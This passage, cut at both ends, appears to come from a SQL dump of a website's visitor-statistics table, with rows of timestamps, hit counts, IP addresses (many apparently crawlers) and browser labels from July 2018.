54.36.148.252','other'),(278521,1532456770,1,1,0,0,'54.36.148.145','other'),(278522,1532457045,1,1,0,0,'54.36.148.205','other'),(278523,1532457109,1,1,0,0,'54.36.148.207','other'),(278524,1532457195,1,1,0,0,'54.36.148.111','other'),(278525,1532457222,1,1,0,0,'87.250.224.46','other'),(278526,1532457271,1,1,0,0,'54.36.148.210','other'),(278527,1532457401,1,1,0,0,'54.36.148.171','other'),(278528,1532457449,1,1,0,0,'54.36.148.231','other'),(278529,1532457824,1,1,0,0,'54.36.148.236','other'),(278530,1532457891,1,1,0,0,'188.232.113.219','msie'),(278531,1532458055,1,1,0,0,'54.36.149.11','other'),(278532,1532458063,1,1,0,0,'54.36.148.24','other'),(278533,1532458595,1,1,0,0,'54.36.148.229','other'),(278534,1532458702,1,0,1,0,'66.249.75.201',''),(278535,1532458707,1,1,0,0,'180.76.15.151','other'),(278536,1532459196,2,2,0,0,'54.36.148.215','other'),(278537,1532459428,1,1,0,0,'54.36.148.162','other'),(278538,1532459612,1,1,0,0,'54.36.148.62','other'),(278539,1532459651,1,1,0,0,'54.36.148.21','other'),(278540,1532460017,1,1,0,0,'54.36.148.12','other'),(278541,1532460153,2,2,0,0,'216.244.66.241','other'),(278542,1532460306,1,1,0,0,'54.36.148.197','other'),(278543,1532460335,1,1,0,0,'54.36.149.53','other'),(278544,1532460449,2,2,0,0,'91.196.178.132','chrome'),(278545,1532460890,1,1,0,0,'91.196.178.167','chrome'),(278546,1532461007,1,1,0,0,'8.29.198.26','other'),(278547,1532462249,1,1,0,0,'54.36.148.116','other'),(278548,1532462674,1,1,0,0,'54.36.148.231','other'),(278549,1532462840,2,2,0,0,'54.36.148.11','other'),(278550,1532463221,1,1,0,0,'54.36.148.178','other'),(278551,1532463341,1,0,1,0,'66.249.75.201',''),(278552,1532463541,1,1,0,0,'54.36.148.221','other'),(278553,1532463699,1,1,0,0,'54.36.149.87','other'),(278554,1532464094,1,1,0,0,'54.36.149.10','other'),(278555,1532464191,1,1,0,0,'91.196.178.33','chrome'),(278556,1532464312,1,1,0,0,'176.120.111.8','chrome'),(278557,1532464343,1,1,0,0,'207.46.13.123','other'),(278558,1532464753,1,1,0,0,'54.36.148.107','other'),(278559,1532464908,1,1,0,0,'87.250.224.46','other'),(278560,1532465095,1,1,0,0,'54.36.148.127','other'),(278561,1532465100,1,1,0,0,'8.29.198.27','other'),(278562,1532465298,1,1,0,0,'216.244.66.241','other'),(278563,1532466191,1,1,0,0,'54.36.148.169','other'),(278564,1532466526,1,1,0,0,'54.36.148.226','other'),(278565,1532466868,1,1,0,0,'54.36.148.42','other'),(278566,1532467157,1,1,0,0,'216.244.66.241','other'),(278567,1532467373,1,1,0,0,'54.36.148.223','other'),(278568,1532467740,1,1,0,0,'54.36.148.236','other'),(278569,1532467797,1,1,0,0,'54.36.148.109','other'),(278570,1532467888,1,1,0,0,'54.36.148.19','other'),(278571,1532467999,1,1,0,0,'54.36.148.240','other'),(278572,1532468174,1,1,0,0,'141.8.142.74','other'),(278573,1532468187,1,1,0,0,'216.244.66.241','other'),(278574,1532468318,1,1,0,0,'54.36.148.131','other'),(278575,1532468357,1,1,0,0,'54.36.148.213','other'),(278576,1532468369,1,1,0,0,'54.36.149.19','other'),(278577,1532468566,1,1,0,0,'51.255.65.46','other'),(278578,1532469024,1,1,0,0,'54.36.148.163','other'),(278579,1532469072,1,1,0,0,'54.36.148.199','other'),(278580,1532469095,1,1,0,0,'37.9.113.182','other'),(278581,1532469298,1,1,0,0,'194.187.170.108','other'),(278582,1532469391,1,1,0,0,'54.36.148.188','other'),(278583,1532469412,1,1,0,0,'54.36.148.115','other'),(278584,1532469429,1,1,0,0,'54.36.149.59','other'),(278585,1532469671,1,1,0,0,'54.36.149.17','other'),(278586,1532470247,1,1,0,0,'87.250.224.46','other'),(278587,1532470405,1,1,0,0,'51.255.65.46','other'),(278588,1532470416,1,0,1,0,'66.249.75.195',''),(278589,1532470442,1,1,0,0,'54.36.148.218','other'),(278590,1532470516,1,1,0,0,'54.36.148.180','other'),(278591,1532470695,1,1,0,0,'54.36.148.38','other'),(278592,1532471277,1,1,0,0,'54.36.148.198','other'),(278593,1532471450,9,9,0,0,'157.55.39.131','other'),(278594,1532471589,1,1,0,0,'54.36.149.4','other'),(278595,1532471627,6,6,0,0,'40.77.167.134','other'),(278596,1532471637,8,8,0,0,'207.46.13.123','other'),(278597,1532471641,12,12,0,0,'157.55.39.153','other'),(278598,1532471785,1,1,0,0,'54.36.148.105','other'),(278599,1532471861,1,1,0,0,'8.29.198.26','other'),(278600,1532472035,1,1,0,0,'54.36.149.102','other'),(278601,1532472637,1,1,0,0,'54.36.149.95','other'),(278602,1532472735,1,1,0,0,'54.36.148.124','other'),(278603,1532472942,1,1,0,0,'54.36.148.157','other'),(278604,1532473005,1,1,0,0,'54.36.148.244','other'),(278605,1532473039,1,1,0,0,'54.36.148.63','other'),(278606,1532473495,1,1,0,0,'54.36.149.41','other'),(278607,1532473799,1,1,0,0,'54.36.148.120','other'),(278608,1532474011,1,0,1,0,'66.249.69.157',''),(278609,1532474295,1,1,0,0,'54.36.149.62','other'),(278610,1532474850,1,1,0,0,'178.154.171.88','other'),(278611,1532474854,1,1,0,0,'141.8.142.74','other'),(278612,1532474916,1,1,0,0,'54.36.148.249','other'),(278613,1532475288,1,1,0,0,'54.36.148.147','other'),(278614,1532475975,1,1,0,0,'8.29.198.25','other'),(278615,1532476093,1,1,0,0,'54.36.149.102','other'),(278616,1532476317,1,1,0,0,'216.244.66.241','other'),(278617,1532476584,1,1,0,0,'54.36.148.10','other'),(278618,1532476605,1,1,0,0,'54.36.149.95','other'),(278619,1532476617,1,1,0,0,'54.36.149.25','other'),(278620,1532476641,1,1,0,0,'54.36.148.215','other'),(278621,1532476766,1,1,0,0,'54.36.149.93','other'),(278622,1532476830,1,1,0,0,'54.36.148.218','other'),(278623,1532478240,1,1,0,0,'141.8.142.74','other'),(278624,1532480305,1,1,0,0,'157.55.39.153','other'),(278625,1532482327,1,1,0,0,'52.34.24.33','chrome'),(278626,1532482709,1,1,0,0,'8.29.198.27','other'),(278627,1532484140,2,2,0,0,'216.244.66.241','other'),(278628,1532486082,1,1,0,0,'37.9.113.114','other'),(278629,1532486824,1,1,0,0,'8.29.198.27','other'),(278630,1532486961,34,34,0,0,'158.69.252.176','other'),(278631,1532487082,1,1,0,0,'95.163.255.113','other'),(278632,1532487097,1,1,0,0,'95.163.255.116','other'),(278633,1532487107,1,1,0,0,'95.163.255.102','other'),(278634,1532487114,1,1,0,0,'95.163.255.103','other'),(278635,1532487123,1,1,0,0,'95.163.255.108','other'),(278636,1532487133,1,1,0,0,'95.163.255.114','other'),(278637,1532487148,1,1,0,0,'95.163.255.119','other'),(278638,1532487182,1,0,1,0,'66.249.75.195',''),(278639,1532488240,1,1,0,0,'157.55.39.131','other'),(278640,1532489143,1,0,1,0,'66.249.75.201',''),(278641,1532489662,1,1,0,0,'141.8.142.74','other'),(278642,1532490717,1,0,1,0,'66.249.75.195',''),(278643,1532491827,2,0,2,0,'66.249.69.157',''),(278644,1532491955,1,0,1,0,'66.249.69.156',''),(278645,1532492218,1,1,0,0,'66.249.69.156','chrome'),(278646,1532493019,1,1,0,0,'157.55.39.153','other'),(278647,1532493555,1,1,0,0,'8.29.198.27','other'),(278648,1532494119,2,2,0,0,'95.213.141.126','opera'),(278649,1532494271,1,1,0,0,'66.249.69.157','chrome'),(278650,1532494478,1,1,0,0,'178.154.171.88','other'),(278651,1532495434,2,2,0,0,'91.196.178.169','chrome'),(278652,1532496668,1,1,0,0,'37.55.93.20','chrome'),(278653,1532496959,1,1,0,0,'66.102.9.35','chrome'),(278654,1532497045,2,2,0,0,'91.196.178.169','chrome'),(278655,1532497320,1,1,0,0,'207.46.13.189','other'),(278656,1532497673,1,1,0,0,'8.29.198.26','other'),(278657,1532497983,1,1,0,0,'176.120.111.196','chrome'),(278658,1532498419,1,1,0,0,'207.46.13.188','other'),(278659,1532499103,1,1,0,0,'46.211.123.22','chrome'),(278660,1532499528,1,1,0,0,'66.249.75.201','chrome'),(278661,1532499566,2,2,0,0,'141.8.142.74','other'),(278662,1532500175,1,1,0,0,'178.154.171.88','other'),(278663,1532500287,1,1,0,0,'82.207.49.110','chrome'),(278664,1532501155,1,1,0,0,'91.196.178.103','chrome'),(278665,1532501193,1,1,0,0,'207.46.13.188','other'),(278666,1532501494,1,1,0,0,'216.244.66.241','other'),(278667,1532501554,2,2,0,0,'176.105.216.189','chrome'),(278668,1532501640,1,1,0,0,'195.244.8.101','firefox'),(278669,1532502049,2,2,0,0,'91.196.178.169','chrome'),(278670,1532502329,2,2,0,0,'130.180.216.122','chrome'),(278671,1532502549,1,1,0,0,'216.244.66.241','other'),(278672,1532503106,1,1,0,0,'91.196.178.103','chrome'),(278673,1532504450,1,1,0,0,'8.29.198.27','other'),(278674,1532504542,1,1,0,0,'91.196.178.37','chrome'),(278675,1532504815,1,1,0,0,'216.244.66.241','other'),(278676,1532505503,1,1,0,0,'37.54.40.30','chrome'),(278677,1532506011,1,1,0,0,'37.59.44.118','firefox'),(278678,1532506328,1,1,0,0,'66.249.75.201','chrome'),(278679,1532506857,1,1,0,0,'46.105.124.55','firefox'),(278680,1532507459,1,1,0,0,'95.163.255.167','other'),(278681,1532507752,1,1,0,0,'216.244.66.241','other'),(278682,1532508498,1,1,0,0,'91.196.177.46','chrome'),(278683,1532508518,1,1,0,0,'8.29.198.25','other'),(278684,1532509017,1,1,0,0,'37.52.19.149','chrome'),(278685,1532509019,1,1,0,0,'37.55.93.20','chrome'),(278686,1532509278,1,1,0,0,'216.244.66.241','other'),(278687,1532510038,1,1,0,0,'178.154.171.88','other'),(278688,1532510693,1,1,0,0,'178.95.66.69','chrome'),(278689,1532511646,1,1,0,0,'77.244.42.165','chrome'),(278690,1532511668,2,2,0,0,'216.244.66.241','other'),(278691,1532511711,2,2,0,0,'91.196.178.86','chrome'),(278692,1532512170,1,1,0,0,'46.133.166.125','chrome'),(278693,1532512517,1,1,0,0,'95.163.255.190','other'),(278694,1532512926,1,1,0,0,'95.163.255.176','other'),(278695,1532513694,1,1,0,0,'95.163.255.112','other'),(278696,1532513926,1,1,0,0,'178.154.200.41','other'),(278697,1532514440,2,2,0,0,'5.153.140.167','chrome'),(278698,1532514728,1,1,0,0,'91.196.177.147','chrome'),(278699,1532514737,1,1,0,0,'216.244.66.241','other'),(278700,1532514800,1,1,0,0,'46.133.49.91','other'),(278701,1532514851,1,1,0,0,'207.46.13.188','other'),(278702,1532515216,1,1,0,0,'162.210.196.130','other'),(278703,1532515333,1,1,0,0,'8.29.198.27','other'),(278704,1532515979,1,1,0,0,'178.154.171.88','other'),(278705,1532517135,1,1,0,0,'207.46.13.186','other'),(278706,1532517727,1,1,0,0,'95.132.44.233','firefox'),(278707,1532519383,1,1,0,0,'8.29.198.26','other'),(278708,1532520478,1,1,0,0,'178.92.139.116','chrome'),(278709,1532521205,2,2,0,0,'91.196.178.86','chrome'),(278710,1532521419,1,1,0,0,'46.211.107.201','chrome'),(278711,1532521502,1,1,0,0,'178.154.200.7','other'),(278712,1532521759,1,1,0,0,'134.249.50.5','chrome'),(278713,1532521817,1,1,0,0,'180.76.15.19','other'),(278714,1532522544,1,1,0,0,'95.163.255.171','other'),(278715,1532522570,1,1,0,0,'216.244.66.241','other'),(278716,1532523493,1,1,0,0,'95.163.255.158','other'),(278717,1532524152,1,1,0,0,'54.208.102.37','other'),(278718,1532524154,1,1,0,0,'107.21.1.8','other'),(278719,1532524907,1,1,0,0,'62.244.58.10','chrome'),(278720,1532524953,1,1,0,0,'69.12.66.250','chrome'),(278721,1532525035,1,1,0,0,'91.209.11.236','other'),(278722,1532525506,1,1,0,0,'178.93.199.90','chrome'),(278723,1532525545,1,1,0,0,'95.28.174.249','chrome'),(278724,1532525546,1,1,0,0,'95.24.153.11','chrome'),(278725,1532526108,1,1,0,0,'91.196.178.82','firefox'),(278726,1532526144,1,1,0,0,'69.12.66.250','chrome'),(278727,1532526209,1,1,0,0,'178.92.238.37','chrome'),(278728,1532526228,1,1,0,0,'8.29.198.26','other'),(278729,1532526310,2,2,0,0,'91.196.178.86','chrome'),(278730,1532526949,1,1,0,0,'113.57.46.245','other'),(278731,1532527646,1,1,0,0,'91.196.178.134','firefox'),(278732,1532527708,1,1,0,0,'207.46.13.189','other'),(278733,1532529138,1,1,0,0,'207.46.13.189','other'),(278734,1532529405,1,1,0,0,'5.166.131.228','msie'),(278735,1532530104,26,26,0,0,'207.46.13.189','other'),(278736,1532530228,1,1,0,0,'8.29.198.25','other'),(278737,1532530305,15,15,0,0,'207.46.13.188','other'),(278738,1532530321,14,14,0,0,'207.46.13.180','other'),(278739,1532530335,12,12,0,0,'207.46.13.186','other'),(278740,1532530957,2,2,0,0,'173.212.254.158','other'),(278741,1532531330,1,1,0,0,'108.59.8.80','other'),(278742,1532531815,1,1,0,0,'95.163.255.98','other'),(278743,1532532799,1,1,0,0,'95.163.255.93','other'),(278744,1532533524,1,1,0,0,'216.244.66.241','other'),(278745,1532533760,1,1,0,0,'141.8.142.74','other'),(278746,1532533995,1,0,1,0,'66.249.69.158',''),(278747,1532535624,1,1,0,0,'141.8.142.74','other'),(278748,1532536196,1,1,0,0,'188.230.43.254','other'),(278749,1532536537,1,1,0,0,'91.196.178.134','firefox'),(278750,1532536596,1,1,0,0,'216.244.66.241','other'),(278751,1532536843,1,1,0,0,'141.8.142.74','other'),(278752,1532537135,1,1,0,0,'8.29.198.25','other'),(278753,1532538419,2,2,0,0,'216.244.66.241','other'),(278754,1532538565,1,1,0,0,'141.8.142.74','other'),(278755,1532538569,1,1,0,0,'178.154.171.88','other'),(278756,1532538635,1,1,0,0,'188.230.43.254','other'),(278757,1532539249,1,0,1,0,'66.249.69.157',''),(278758,1532539688,1,1,0,0,'149.202.191.12','firefox'),(278759,1532540340,1,1,0,0,'95.163.255.190','other'),(278760,1532540727,3,3,0,0,'216.244.66.241','other'),(278761,1532540899,1,1,0,0,'207.46.13.180','other'),(278762,1532541008,1,1,0,0,'188.230.43.254','other'),(278763,1532541103,1,1,0,0,'8.29.198.27','other'),(278764,1532541734,1,1,0,0,'216.244.66.241','other'),(278765,1532542723,1,1,0,0,'207.46.13.186','other'),(278766,1532542871,1,1,0,0,'95.163.255.96','other'),(278767,1532543022,1,1,0,0,'178.154.171.88','other'),(278768,1532543429,1,1,0,0,'188.230.43.254','other'),(278769,1532543567,1,0,1,0,'66.249.69.158',''),(278770,1532544437,1,1,0,0,'66.249.81.195','chrome'),(278771,1532544442,2,2,0,0,'216.244.66.241','other'),(278772,1532547508,1,1,0,0,'54.165.59.7','other'),(278773,1532549208,1,1,0,0,'8.29.198.26','other'),(278774,1532549760,1,1,0,0,'216.244.66.241','other'),(278775,1532549934,1,1,0,0,'207.46.13.180','other'),(278776,1532551954,1,1,0,0,'8.29.198.25','other'),(278777,1532551965,1,1,0,0,'216.244.66.241','other'),(278778,1532552487,1,1,0,0,'5.9.71.213','other'),(278779,1532554411,1,1,0,0,'207.46.13.189','other'),(278780,1532554729,1,0,1,0,'66.249.69.158',''),(278781,1532555066,3,3,0,0,'216.244.66.241','other'),(278782,1532556686,1,1,0,0,'207.46.13.189','other'),(278783,1532558569,1,1,0,0,'52.53.201.78','chrome'),(278784,1532559260,1,0,1,0,'66.249.69.158',''),(278785,1532559449,1,1,0,0,'66.249.69.156','chrome'),(278786,1532559544,2,2,0,0,'216.244.66.241','other'),(278787,1532560367,1,1,0,0,'8.29.198.27','other'),(278788,1532560521,1,0,1,0,'66.249.69.156',''),(278789,1532561570,2,2,0,0,'216.244.66.241','other'),(278790,1532562808,1,1,0,0,'8.29.198.27','other'),(278791,1532562872,1,1,0,0,'180.76.15.160','other'),(278792,1532562930,1,1,0,0,'216.244.66.241','other'),(278793,1532564188,1,0,1,0,'66.249.69.156',''),(278794,1532567312,2,2,0,0,'216.244.66.241','other'),(278795,1532567866,1,0,1,0,'66.249.75.199',''),(278796,1532569149,1,1,0,0,'207.46.13.189','other'),(278797,1532569703,2,0,2,0,'66.249.69.157',''),(278798,1532569985,1,1,0,0,'87.250.224.66','other'),(278799,1532570134,1,1,0,0,'35.162.70.167','chrome'),(278800,1532570257,1,1,0,0,'37.9.113.56','other'),(278801,1532571226,1,1,0,0,'207.46.13.189','other'),(278802,1532571273,1,1,0,0,'8.29.198.26','other'),(278803,1532572581,1,1,0,0,'95.108.181.111','other'),(278804,1532572774,1,1,0,0,'23.101.169.3','msie'),(278805,1532573658,1,1,0,0,'8.29.198.26','other'),(278806,1532573984,1,1,0,0,'173.208.206.50','other'),(278807,1532574405,2,1,1,0,'66.249.75.199',''),(278808,1532574968,1,1,0,0,'23.101.169.3','msie'),(278809,1532575223,1,0,1,0,'66.249.69.156',''),(278810,1532576570,1,0,1,0,'66.249.75.201',''),(278811,1532576791,1,1,0,0,'180.76.15.150','other'),(278812,1532578290,1,0,1,0,'66.249.69.157',''),(278813,1532578320,1,0,1,0,'66.249.69.158',''),(278814,1532579431,1,1,0,0,'23.101.169.3','msie'),(278815,1532579579,1,1,0,0,'207.46.13.189','other'),(278816,1532579937,1,0,1,0,'66.249.75.199',''),(278817,1532580354,2,2,0,0,'216.244.66.241','other'),(278818,1532580794,1,1,0,0,'207.46.13.180','other'),(278819,1532581345,2,0,2,0,'66.249.75.195',''),(278820,1532581592,1,1,0,0,'178.154.200.8','other'),(278821,1532581950,1,1,0,0,'195.128.139.246','chrome'),(278822,1532581956,1,0,1,0,'66.249.75.201',''),(278823,1532582201,1,1,0,0,'8.29.198.25','other'),(278824,1532583163,1,1,0,0,'91.196.178.100','firefox'),(278825,1532583395,1,0,1,0,'66.249.69.157',''),(278826,1532583407,1,0,1,0,'66.249.75.201',''),(278827,1532583830,1,0,1,0,'66.249.75.199',''),(278828,1532584181,1,1,0,0,'95.133.1.225','chrome'),(278829,1532584188,2,2,0,0,'40.85.245.37','other'),(278830,1532584312,1,1,0,0,'91.124.182.170','firefox'),(278831,1532584512,1,1,0,0,'8.29.198.25','other'),(278832,1532584536,2,2,0,0,'162.210.196.100','other'),(278833,1532584975,1,1,0,0,'23.101.169.3','msie'),(278834,1532585053,1,1,0,0,'40.77.167.60','other'),(278835,1532585484,1,1,0,0,'178.154.171.60','other'),(278836,1532585509,1,0,1,0,'66.249.75.195',''),(278837,1532585618,1,1,0,0,'66.249.75.199','chrome'),(278838,1532585913,1,1,0,0,'95.163.255.118','other'),(278839,1532585976,1,1,0,0,'95.163.255.115','other'),(278840,1532586010,2,2,0,0,'91.196.177.46','chrome'),(278841,1532586045,1,1,0,0,'95.163.255.103','other'),(278842,1532586123,1,1,0,0,'95.163.255.106','other'),(278843,1532586232,2,2,0,0,'95.132.50.225','chrome'),(278844,1532586924,1,1,0,0,'66.102.9.40','chrome'),(278845,1532586967,1,1,0,0,'66.102.9.38','chrome'),(278846,1532587089,1,1,0,0,'195.24.137.118','chrome'),(278847,1532587338,1,1,0,0,'46.211.5.112','chrome'),(278848,1532587340,1,1,0,0,'66.102.9.35','chrome'),(278849,1532587474,1,1,0,0,'46.211.131.152','other'),(278850,1532587855,1,1,0,0,'66.102.9.40','chrome'),(278851,1532587869,1,1,0,0,'66.102.9.38','chrome'),(278852,1532587886,1,1,0,0,'207.46.13.186','other'),(278853,1532588028,1,1,0,0,'46.211.119.68','chrome'),(278854,1532588147,1,1,0,0,'216.244.66.241','other'),(278855,1532588193,1,1,0,0,'178.92.138.117','chrome'),(278856,1532588555,1,1,0,0,'91.196.178.180','chrome'),(278857,1532588842,1,1,0,0,'66.102.9.40','chrome'),(278858,1532589141,1,1,0,0,'37.55.93.20','chrome'),(278859,1532589300,1,1,0,0,'178.94.176.67','firefox'),(278860,1532589393,1,1,0,0,'95.108.213.24','other'),(278861,1532589700,1,1,0,0,'37.53.227.22','chrome'),(278862,1532591156,1,1,0,0,'40.77.167.60','other'),(278863,1532591414,1,1,0,0,'46.164.130.92','chrome'),(278864,1532591728,2,2,0,0,'159.253.145.183','firefox'),(278865,1532591730,1,0,1,0,'66.249.75.199',''),(278866,1532591766,1,1,0,0,'180.76.15.22','other'),(278867,1532592089,1,1,0,0,'178.95.66.69','chrome'),(278868,1532592596,1,1,0,0,'178.154.200.7','other'),(278869,1532593127,1,1,0,0,'8.29.198.27','other'),(278870,1532593147,3,3,0,0,'216.244.66.241','other'),(278871,1532593842,1,1,0,0,'37.53.155.229','chrome'),(278872,1532594780,4,4,0,0,'37.52.6.232','chrome'),(278873,1532594842,2,1,1,0,'66.249.75.199',''),(278874,1532594926,1,0,1,0,'66.249.75.201',''),(278875,1532595001,1,0,1,0,'66.249.69.157',''),(278876,1532595004,1,1,0,0,'66.249.69.157','chrome'),(278877,1532595111,1,1,0,0,'66.249.69.156','chrome'),(278878,1532595194,1,1,0,0,'95.163.255.96','other'),(278879,1532595364,1,1,0,0,'8.29.198.27','other'),(278880,1532595948,2,2,0,0,'91.196.178.169','chrome'),(278881,1532596076,1,1,0,0,'31.41.65.169','chrome'),(278882,1532596127,1,1,0,0,'207.46.13.189','other'),(278883,1532596782,1,1,0,0,'91.196.179.138','chrome'),(278884,1532596818,1,1,0,0,'176.125.40.81','chrome'),(278885,1532596850,1,1,0,0,'109.86.71.21','firefox'),(278886,1532597149,1,1,0,0,'66.249.69.158','chrome'),(278887,1532597366,1,0,1,0,'66.249.75.201',''),(278888,1532597690,1,1,0,0,'91.196.179.138','chrome'),(278889,1532598197,1,1,0,0,'37.52.19.149','chrome'),(278890,1532598620,1,0,1,0,'66.249.69.157',''),(278891,1532598876,1,1,0,0,'95.163.255.108','other'),(278892,1532600138,1,1,0,0,'40.77.167.60','other'),(278893,1532600403,1,1,0,0,'178.154.171.88','other'),(278894,1532600404,1,1,0,0,'141.8.142.74','other'),(278895,1532600601,1,1,0,0,'178.92.24.178','chrome'),(278896,1532600674,1,1,0,0,'216.244.66.241','other'),(278897,1532601059,1,1,0,0,'91.196.178.171','chrome'),(278898,1532602264,1,1,0,0,'141.8.142.74','other'),(278899,1532602265,1,0,1,0,'66.249.69.156',''),(278900,1532602708,1,1,0,0,'178.154.171.60','other'),(278901,1532602785,1,1,0,0,'95.163.255.107','other'),(278902,1532603026,1,1,0,0,'37.52.182.227','chrome'),(278903,1532603187,1,1,0,0,'87.250.224.46','other'),(278904,1532603904,1,1,0,0,'94.178.147.105','chrome'),(278905,1532603947,1,1,0,0,'216.244.66.241','other'),(278906,1532604075,1,1,0,0,'8.29.198.27','other'),(278907,1532604818,1,1,0,0,'193.110.112.162','chrome'),(278908,1532605664,1,1,0,0,'66.249.69.156','chrome'),(278909,1532606200,1,1,0,0,'8.29.198.25','other'),(278910,1532606385,2,2,0,0,'178.92.170.183','chrome'),(278911,1532606397,1,1,0,0,'216.244.66.241','other'),(278912,1532606963,1,1,0,0,'94.178.113.203','chrome'),(278913,1532607326,3,3,0,0,'216.244.66.241','other'),(278914,1532607459,1,0,1,0,'66.249.69.158',''),(278916,1532607655,1,1,0,0,'92.113.183.182','chrome'),(278917,1532608506,2,2,0,0,'91.196.178.86','chrome'),(278918,1532608823,1,1,0,0,'31.43.89.51','firefox'),(278919,1532608963,1,1,0,0,'178.154.171.88','other'),(278920,1532609072,1,0,1,0,'66.249.75.195',''),(278921,1532609123,2,0,2,0,'66.249.75.201',''),(278922,1532609275,3,3,0,0,'216.244.66.241','other'),(278923,1532609740,3,3,0,0,'91.196.178.61','chrome'),(278924,1532609797,2,2,0,0,'141.8.142.74','other'),(278925,1532610113,1,1,0,0,'46.219.77.169','chrome'),(278926,1532610726,1,1,0,0,'40.77.167.60','other'),(278927,1532610756,2,2,0,0,'178.154.171.88','other'),(278928,1532611501,1,1,0,0,'141.8.142.74','other'),(278929,1532611584,2,2,0,0,'91.196.178.61','chrome'),(278930,1532611965,1,1,0,0,'91.196.178.83','firefox'),(278931,1532612982,1,0,1,0,'66.249.69.158',''),(278932,1532612985,1,0,1,0,'66.249.69.157',''),(278933,1532612990,1,1,0,0,'66.249.75.195','chrome'),(278934,1532613680,2,2,0,0,'91.196.178.169','chrome'),(278935,1532614006,1,0,1,0,'66.249.75.201',''),(278936,1532614152,2,2,0,0,'216.244.66.241','other'),(278937,1532614448,2,2,0,0,'141.8.142.74','other'),(278938,1532614578,1,0,1,0,'66.249.75.195',''),(278939,1532614915,1,1,0,0,'66.249.75.201','chrome'),(278940,1532615025,1,1,0,0,'8.29.198.26','other'),(278941,1532615557,1,1,0,0,'216.244.66.241','other'),(278942,1532615719,1,1,0,0,'188.163.19.91','chrome'),(278943,1532615721,1,1,0,0,'91.124.27.239','chrome'),(278944,1532615838,1,1,0,0,'94.130.9.183','other'),(278945,1532616376,1,0,1,0,'66.249.75.201',''),(278946,1532616398,2,0,2,0,'66.249.75.195',''),(278947,1532616445,1,1,0,0,'66.249.75.195','chrome'),(278948,1532616455,1,1,0,0,'91.196.178.103','chrome'),(278949,1532616876,1,1,0,0,'54.165.59.7','other'),(278950,1532617080,1,1,0,0,'8.29.198.26','other'),(278951,1532617092,1,1,0,0,'141.8.142.74','other'),(278952,1532618583,1,1,0,0,'91.196.178.89','firefox'),(278953,1532618787,1,1,0,0,'207.46.13.189','other'),(278954,1532620083,1,1,0,0,'141.8.142.74','other'),(278955,1532620155,3,1,2,0,'66.249.75.199',''),(278956,1532620184,5,0,5,0,'66.249.75.195',''),(278957,1532620234,3,0,3,0,'66.249.75.201',''),(278958,1532620457,2,1,1,0,'66.249.75.195',''),(278959,1532620674,1,1,0,0,'216.244.66.241','other'),(278960,1532620833,2,2,0,0,'46.211.110.215','chrome'),(278961,1532621596,1,1,0,0,'178.154.171.88','other'),(278962,1532621748,1,1,0,0,'95.163.255.189','other'),(278963,1532621946,1,1,0,0,'95.163.255.99','other'),(278964,1532621971,1,1,0,0,'207.46.13.186','other'),(278965,1532622349,1,1,0,0,'141.8.142.74','other'),(278966,1532622426,3,3,0,0,'216.244.66.241','other'),(278967,1532623193,1,1,0,0,'66.249.69.157','chrome'),(278968,1532623225,1,1,0,0,'178.154.171.88','other'),(278969,1532624309,2,2,0,0,'178.154.171.88','other'),(278970,1532624488,1,0,1,0,'66.249.75.195',''),(278971,1532625955,1,1,0,0,'8.29.198.25','other'),(278972,1532626308,2,2,0,0,'92.113.189.235','chrome'),(278973,1532626878,2,2,0,0,'141.8.142.74','other'),(278974,1532627822,1,1,0,0,'178.154.171.88','other'),(278975,1532627823,1,1,0,0,'216.244.66.241','other'),(278976,1532627941,1,1,0,0,'8.29.198.25','other'),(278977,1532627967,1,1,0,0,'178.154.200.41','other'),(278978,1532629550,1,1,0,0,'178.238.233.160','firefox'),(278979,1532630273,2,2,0,0,'91.196.178.186','chrome'),(278980,1532630393,1,1,0,0,'178.154.171.88','other'),(278981,1532630417,1,1,0,0,'13.66.205.121','other'),(278982,1532632658,2,2,0,0,'91.196.178.37','chrome'),(278983,1532633244,1,1,0,0,'95.133.238.105','other'),(278984,1532633802,1,1,0,0,'216.244.66.241','other'),(278985,1532633807,1,0,1,0,'66.249.75.199',''),(278986,1532634609,1,1,0,0,'13.66.205.121','other'),(278987,1532634929,1,1,0,0,'178.154.171.88','other'),(278988,1532635009,1,1,0,0,'141.8.132.19','other'),(278989,1532635318,1,1,0,0,'93.72.24.226','chrome'),(278990,1532635899,1,1,0,0,'141.8.142.74','other'),(278991,1532635902,1,1,0,0,'178.154.171.88','other'),(278992,1532636217,1,1,0,0,'37.9.113.100','other'),(278993,1532636580,2,2,0,0,'216.244.66.241','other'),(278994,1532636814,1,1,0,0,'37.9.113.134','other'),(278995,1532636815,1,1,0,0,'141.8.132.19','other'),(278996,1532636877,1,1,0,0,'178.154.171.88','other'),(278997,1532636895,1,1,0,0,'8.29.198.26','other'),(278998,1532638247,3,3,0,0,'216.244.66.241','other'),(278999,1532638584,1,1,0,0,'87.250.224.46','other'),(279000,1532638710,1,1,0,0,'37.9.113.115','other'),(279001,1532638736,1,1,0,0,'141.8.132.22','other'),(279002,1532638792,1,1,0,0,'8.29.198.27','other'),(279003,1532639572,1,1,0,0,'66.249.75.199','chrome'),(279004,1532639682,2,2,0,0,'87.250.224.46','other'),(279005,1532640330,1,1,0,0,'178.154.171.88','other'),(279006,1532640503,1,1,0,0,'5.188.210.36','chrome'),(279007,1532640982,1,1,0,0,'216.244.66.241','other'),(279008,1532641297,1,0,1,0,'66.249.75.195',''),(279009,1532641322,1,1,0,0,'178.154.171.88','other'),(279010,1532641457,1,1,0,0,'141.8.142.74','other'),(279011,1532641521,1,1,0,0,'87.250.224.46','other'),(279012,1532641571,1,0,1,0,'66.249.75.201',''),(279013,1532641936,1,1,0,0,'180.76.15.144','other'),(279014,1532642896,1,1,0,0,'87.250.224.46','other'),(279015,1532642905,1,1,0,0,'178.154.171.88','other'),(279016,1532643315,1,1,0,0,'141.8.142.74','other'),(279017,1532643395,4,4,0,0,'216.244.66.241','other'),(279018,1532643747,2,0,2,0,'66.249.75.195',''),(279019,1532643812,2,0,2,0,'66.249.75.199',''),(279020,1532644047,1,1,0,0,'178.154.200.73','other'),(279021,1532644300,1,1,0,0,'141.8.132.19','other'),(279022,1532644650,1,1,0,0,'207.46.13.186','other'),(279023,1532644881,1,1,0,0,'141.8.142.74','other'),(279024,1532644920,1,1,0,0,'87.250.224.46','other'),(279025,1532645864,2,2,0,0,'141.8.142.74','other'),(279026,1532646054,1,1,0,0,'178.154.171.88','other'),(279027,1532646856,2,2,0,0,'141.8.142.74','other'),(279028,1532646865,1,1,0,0,'199.249.223.78','chrome'),(279029,1532646924,1,1,0,0,'87.250.224.46','other'),(279030,1532647798,1,1,0,0,'8.29.198.26','other'),(279031,1532647825,1,1,0,0,'178.154.200.41','o